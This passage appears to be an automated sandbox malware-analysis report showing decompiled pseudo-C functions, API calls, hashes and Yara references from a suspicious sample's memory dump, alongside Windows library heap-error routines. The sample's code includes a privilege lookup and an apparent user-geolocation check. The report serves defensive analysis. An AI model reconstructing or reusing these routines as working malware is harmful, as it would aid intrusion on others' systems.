                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040985B Relevance: 1.6, APIs: 1, Instructions: 64threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              C-Code - Quality: 77%
                                                              			E0040985B(void* __edx, void* __edi, void* __esi, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				intOrPtr _v117;
				void* __ebx;
				void* _t16;
				int _t18;
				void* _t31;
				long _t34;
				int _t37;
				void* _t40;
				void* _t42;
				void* _t48;

				_t31 = __edi + 1;
				_t48 = __edx - _v117;
				_t40 = _t42;
				_push(_t31);
				_v68 = 0;
				E004200C3( &_v67, 0, 0x3f);
				E00420B63( &_v68, 3);
				_t22 = _a4;
				_t16 = E0040CEC3(_a4, _t31, _t48, _a4 + 0x20,  &_v68); // executed
				_t18 = E00419503(_a4 + 0x20, _t16, 0, 0, E00402E03(0x3183e0dc));
				_t37 = _t18;
				if(_t37 != 0) {
					_t34 = _a8;
					_t18 = PostThreadMessageW(_t34, 0x111, 0, 0); // executed
					if(_t18 == 0) {
						_t18 =  *_t37(_t34, 0x8003, _t40 + (E0040C593(1, 8, _t22 + 0x70) & 0x000000ff) - 0x40, _t18);
					}
				}
				return _t18;
			}















                                                              0x0040985b
                                                              0x00409862
                                                              0x00409864
                                                              0x0040986b
                                                              0x00409874
                                                              0x00409878
                                                              0x00409883
                                                              0x00409888
                                                              0x00409893
                                                              0x004098ab
                                                              0x004098b0
                                                              0x004098b7
                                                              0x004098b9
                                                              0x004098c6
                                                              0x004098ca
                                                              0x004098eb
                                                              0x004098eb
                                                              0x004098ca
                                                              0x004098f3

                                                              APIs
                                                              • PostThreadMessageW.USER32(00000BF4,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098C6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 4d0d6e05e0b5d5bd3aa7b7d3c427cf277d395501f10c66dd976d98796db3d053
                                                              • Instruction ID: 4ede47c2e4d211eba55368fa174b467a50f07aa0e1893d2440daf206efd2b6f0
                                                              • Opcode Fuzzy Hash: 4d0d6e05e0b5d5bd3aa7b7d3c427cf277d395501f10c66dd976d98796db3d053
                                                              • Instruction Fuzzy Hash: 15110C72A4021476E720A6A1DC83FEF77689B40B44F140129FB04BA1C2D6E8690647E9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00409863 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 311 409863-409874 312 40987d-4098b7 call 420b63 call 40cec3 call 402e03 call 419503 311->312 313 409878 call 4200c3 311->313 322 4098b9-4098ca PostThreadMessageW 312->322 323 4098ed-4098f3 312->323 313->312 322->323 324 4098cc-4098ea call 40c593 322->324 324->323
                                                              C-Code - Quality: 84%
                                                              			E00409863(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __ebx;
				void* __edi;
				void* _t13;
				int _t15;
				void* _t24;
				long _t26;
				int _t28;
				void* _t29;
				void* _t33;

				_t33 = __eflags;
				_v68 = 0;
				E004200C3( &_v67, 0, 0x3f);
				E00420B63( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CEC3(_a4, _t24, _t33, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419503(_a4 + 0x20, _t13, 0, 0, E00402E03(0x3183e0dc));
				_t28 = _t15;
				if(_t28 != 0) {
					_t26 = _a8;
					_t15 = PostThreadMessageW(_t26, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t28(_t26, 0x8003, _t29 + (E0040C593(1, 8, _t19 + 0x70) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}














                                                              0x00409863
                                                              0x00409874
                                                              0x00409878
                                                              0x00409883
                                                              0x00409888
                                                              0x00409893
                                                              0x004098ab
                                                              0x004098b0
                                                              0x004098b7
                                                              0x004098b9
                                                              0x004098c6
                                                              0x004098ca
                                                              0x00000000
                                                              0x004098eb
                                                              0x004098ca
                                                              0x004098f3

                                                              APIs
                                                              • PostThreadMessageW.USER32(00000BF4,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098C6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 6319d883eb362a9b3c0b12145f90db619533f4c29dce8f728d654705b2a7b8f2
                                                              • Instruction ID: bdbe6853c708887c046ad6b83e9f62b6247f04250c8adff79c735261f0899694
                                                              • Opcode Fuzzy Hash: 6319d883eb362a9b3c0b12145f90db619533f4c29dce8f728d654705b2a7b8f2
                                                              • Instruction Fuzzy Hash: C401FE72A4021876E7206691DC83FEF775C9B40B44F140169FB047A1C2D6E8AD0643F9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E909 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 31%
                                                              			E0041E909(signed char* __edx, intOrPtr _a12, WCHAR* _a16, WCHAR* _a20, struct _LUID* _a24) {
				void* _v1;
				int _t10;

				asm("sti");
				asm("movsd");
				asm("cmc");
				_pop(_t21);
				asm("cmc");
				asm("cmpsd");
				 *__edx =  *__edx ^ 0x00000055;
				_t7 = _a12;
				E0041F0F3( *((intOrPtr*)(_a12 + 0x660)), _t7, _t7 + 0xab8,  *((intOrPtr*)(_a12 + 0x660)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a16, _a20, _a24); // executed
				return _t10;
			}





                                                              0x0041e90a
                                                              0x0041e90b
                                                              0x0041e90c
                                                              0x0041e90d
                                                              0x0041e90e
                                                              0x0041e90f
                                                              0x0041e911
                                                              0x0041e916
                                                              0x0041e92d
                                                              0x0041e943
                                                              0x0041e947

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FE25,0040FE25,?,00000000,?,?), ref: 0041E943
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 8a9086b14d950a1b46e010a82c6e4c257fe723759444af2a0ec611ecfe19dee0
                                                              • Instruction ID: 775588de0d9e46608f43bbac118e38c3b790faebf380b2df79d764bf0e81c023
                                                              • Opcode Fuzzy Hash: 8a9086b14d950a1b46e010a82c6e4c257fe723759444af2a0ec611ecfe19dee0
                                                              • Instruction Fuzzy Hash: B4E06DB5204608ABD714DF59DC51FE737A9BF89324F0041A9FD185B242C635E855CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E913 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0041E913(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F0F3( *((intOrPtr*)(_a4 + 0x660)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x660)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                              0x0041e92d
                                                              0x0041e943
                                                              0x0041e947

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FE25,0040FE25,?,00000000,?,?), ref: 0041E943
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 084214d49257ded0bc57b796b17f69982c92462ec1337ebf859cfbb047781dae
                                                              • Instruction ID: 146a95e96dc79c5c69f023c6cf12cf58b9f20fcc4238d0bbd84b9f99bc37a815
                                                              • Opcode Fuzzy Hash: 084214d49257ded0bc57b796b17f69982c92462ec1337ebf859cfbb047781dae
                                                              • Instruction Fuzzy Hash: CFE01AB1604208ABD710DF49CC45EE737ADAF89654F118069FA0857242C635E8148AB5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E773 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0041E773(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F0F3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                              0x0041e782
                                                              0x0041e78a
                                                              0x0041e7a0
                                                              0x0041e7a4

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00418BB9,?,00419360,00419360,?,00418BB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E7A0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                              • Instruction ID: 9f1ab4433e44ad65dd488a19a18406680d79a0e05c63de1a84726c80f64be684
                                                              • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                              • Instruction Fuzzy Hash: 8CE046B2200208ABCB14EF89DC45EE73BACEF88764F118059FE085B242C630F914CAF1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040FFD3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 37%
                                                              			E0040FFD3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00419503(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                              0x0040ffed
                                                              0x0040fff7
                                                              0x0040fffd
                                                              0x0041000c
                                                              0x0040fffa
                                                              0x0040fffa
                                                              0x0040fffa

                                                              APIs
                                                              • GetUserGeoID.KERNELBASE(00000010), ref: 0040FFFD
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: User
                                                              • String ID:
                                                              • API String ID: 765557111-0
                                                              • Opcode ID: cd48cdcd120f763e343e92812f1fb625a3c8b0b6998f85fea71fc4464a0d279f
                                                              • Instruction ID: f703ce29fa69559c614cbf0aa450a7e736bfad6ae254d50d481b6c1e78578f76
                                                              • Opcode Fuzzy Hash: cd48cdcd120f763e343e92812f1fb625a3c8b0b6998f85fea71fc4464a0d279f
                                                              • Instruction Fuzzy Hash: 6FE0C27368030526FB2095A98C42FB6324E5B84B00F088475F90CE62C2D4A8E8801014
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E7B3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0041E7B3(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xaa0; // 0xaa0
				E0041F0F3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                              0x0041e7c2
                                                              0x0041e7ca
                                                              0x0041e7e0
                                                              0x0041e7e4

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,90BFA659,00000000,?), ref: 0041E7E0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                              • Instruction ID: 1cc777dd0fb197a61b86c04ff4cb363c80c74cb52651e0a9305c0545d7584438
                                                              • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                              • Instruction Fuzzy Hash: 88E01AB1200204ABCB14DF49DC45EA737ACAF89754F118059B90957242C630E914CAB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A6967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a0de58f616c1567e2f632abb9699660eb43bfd6fe47013784842643a9243cdda
                                                              • Instruction ID: 828f9609f8c6effedad16f9150fff7105cb7980b6009243bdb24b30f8e16e59a
                                                              • Opcode Fuzzy Hash: a0de58f616c1567e2f632abb9699660eb43bfd6fe47013784842643a9243cdda
                                                              • Instruction Fuzzy Hash: E3B09B719015C5C5E711D7704B0871779147BD0741F16C061D1060641A4778C491F5B6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 00ADB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Strings
                                                              • The instruction at %p referenced memory at %p., xrefs: 00ADB432
                                                              • This failed because of error %Ix., xrefs: 00ADB446
                                                              • The critical section is owned by thread %p., xrefs: 00ADB3B9
                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 00ADB48F
                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00ADB38F
                                                              • The resource is owned shared by %d threads, xrefs: 00ADB37E
                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00ADB2DC
                                                              • Go determine why that thread has not released the critical section., xrefs: 00ADB3C5
                                                              • a NULL pointer, xrefs: 00ADB4E0
                                                              • *** enter .exr %p for the exception record, xrefs: 00ADB4F1
                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00ADB323
                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00ADB39B
                                                              • *** then kb to get the faulting stack, xrefs: 00ADB51C
                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00ADB314
                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00ADB2F3
                                                              • The instruction at %p tried to %s , xrefs: 00ADB4B6
                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00ADB484
                                                              • <unknown>, xrefs: 00ADB27E, 00ADB2D1, 00ADB350, 00ADB399, 00ADB417, 00ADB48E
                                                              • *** enter .cxr %p for the context, xrefs: 00ADB50D
                                                              • read from, xrefs: 00ADB4AD, 00ADB4B2
                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00ADB47D
                                                              • an invalid address, %p, xrefs: 00ADB4CF
                                                              • The resource is owned exclusively by thread %p, xrefs: 00ADB374
                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00ADB476
                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00ADB3D6
                                                              • write to, xrefs: 00ADB4A6
                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 00ADB352
                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00ADB53F
                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00ADB305
                                                              • *** Inpage error in %ws:%s, xrefs: 00ADB418
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                              • API String ID: 0-108210295
                                                              • Opcode ID: b3f204fab89cb3c9ceaec6088902d77356779d51d9baea5b105add2f8a3eb3d5
                                                              • Instruction ID: 6e32553288b019f0da637903eddd0969de55e75edaca396cff9d45bd506f0779
                                                              • Opcode Fuzzy Hash: b3f204fab89cb3c9ceaec6088902d77356779d51d9baea5b105add2f8a3eb3d5
                                                              • Instruction Fuzzy Hash: 7F811575A10210FFCB229F159C46EEB3B39AF47B51F024446F4062B253D7668991D6B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AE1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 44%
                                                              			E00AE1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xa048a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A2B150();
				} else {
					E00A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xb1589c);
				E00A2B150("Heap error detected at %p (heap handle %p)\n",  *0xb158a0);
				_t27 =  *0xb15898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00AE1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A2B150();
				} else {
					E00A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00A2B150("Error code: %d - %s\n",  *0xb15898);
				_t113 =  *0xb158a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A2B150();
					} else {
						E00A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A2B150("Parameter1: %p\n",  *0xb158a4);
				}
				_t115 =  *0xb158a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A2B150();
					} else {
						E00A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A2B150("Parameter2: %p\n",  *0xb158a8);
				}
				_t117 =  *0xb158ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A2B150();
					} else {
						E00A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A2B150("Parameter3: %p\n",  *0xb158ac);
				}
				_t119 =  *0xb158b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A2B150();
					} else {
						E00A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xb158b4);
					E00A2B150("Last known valid blocks: before - %p, after - %p\n",  *0xb158b0);
				} else {
					_t120 =  *0xb158b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A2B150();
				} else {
					E00A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00A2B150("Stack trace available at %p\n", 0xb158c0);
			}











                                                              0x00ae1c10
                                                              0x00ae1c16
                                                              0x00ae1c1e
                                                              0x00ae1c3d
                                                              0x00ae1c3e
                                                              0x00ae1c20
                                                              0x00ae1c35
                                                              0x00ae1c3a
                                                              0x00ae1c44
                                                              0x00ae1c55
                                                              0x00ae1c5a
                                                              0x00ae1c65
                                                              0x00ae1c67
                                                              0x00000000
                                                              0x00ae1c6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ae1c67
                                                              0x00ae1cdc
                                                              0x00ae1ce5
                                                              0x00ae1d04
                                                              0x00ae1d05
                                                              0x00ae1ce7
                                                              0x00ae1cfc
                                                              0x00ae1d01
                                                              0x00ae1d0b
                                                              0x00ae1d17
                                                              0x00ae1d1f
                                                              0x00ae1d25
                                                              0x00ae1d30
                                                              0x00ae1d4f
                                                              0x00ae1d50
                                                              0x00ae1d32
                                                              0x00ae1d47
                                                              0x00ae1d4c
                                                              0x00ae1d61
                                                              0x00ae1d67
                                                              0x00ae1d68
                                                              0x00ae1d6e
                                                              0x00ae1d79
                                                              0x00ae1d98
                                                              0x00ae1d99
                                                              0x00ae1d7b
                                                              0x00ae1d90
                                                              0x00ae1d95
                                                              0x00ae1daa
                                                              0x00ae1db0
                                                              0x00ae1db1
                                                              0x00ae1db7
                                                              0x00ae1dc2
                                                              0x00ae1de1
                                                              0x00ae1de2
                                                              0x00ae1dc4
                                                              0x00ae1dd9
                                                              0x00ae1dde
                                                              0x00ae1df3
                                                              0x00ae1df9
                                                              0x00ae1dfa
                                                              0x00ae1e00
                                                              0x00ae1e0a
                                                              0x00ae1e13
                                                              0x00ae1e32
                                                              0x00ae1e33
                                                              0x00ae1e15
                                                              0x00ae1e2a
                                                              0x00ae1e2f
                                                              0x00ae1e39
                                                              0x00ae1e4a
                                                              0x00ae1e02
                                                              0x00ae1e02
                                                              0x00ae1e08
                                                              0x00000000
                                                              0x00000000
                                                              0x00ae1e08
                                                              0x00ae1e5b
                                                              0x00ae1e7a
                                                              0x00ae1e7b
                                                              0x00ae1e5d
                                                              0x00ae1e72
                                                              0x00ae1e77
                                                              0x00ae1e95

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                              • API String ID: 0-2897834094
                                                              • Opcode ID: da67b7685588345a1e0aff088ec66b6619e7e8b25f0965e8f54dc449fd375f16
                                                              • Instruction ID: e38184291980ecf75140fb0bcf7547f99eca8370d368f56e196a03b7f1dbc316
                                                              • Opcode Fuzzy Hash: da67b7685588345a1e0aff088ec66b6619e7e8b25f0965e8f54dc449fd375f16
                                                              • Instruction Fuzzy Hash: 216119335615A4DFC311EB8AE995E7073B4FB44B30B69847AF809AB352D7349CA08B19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A33D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 96%
                                                              			E00A33D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00A31B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
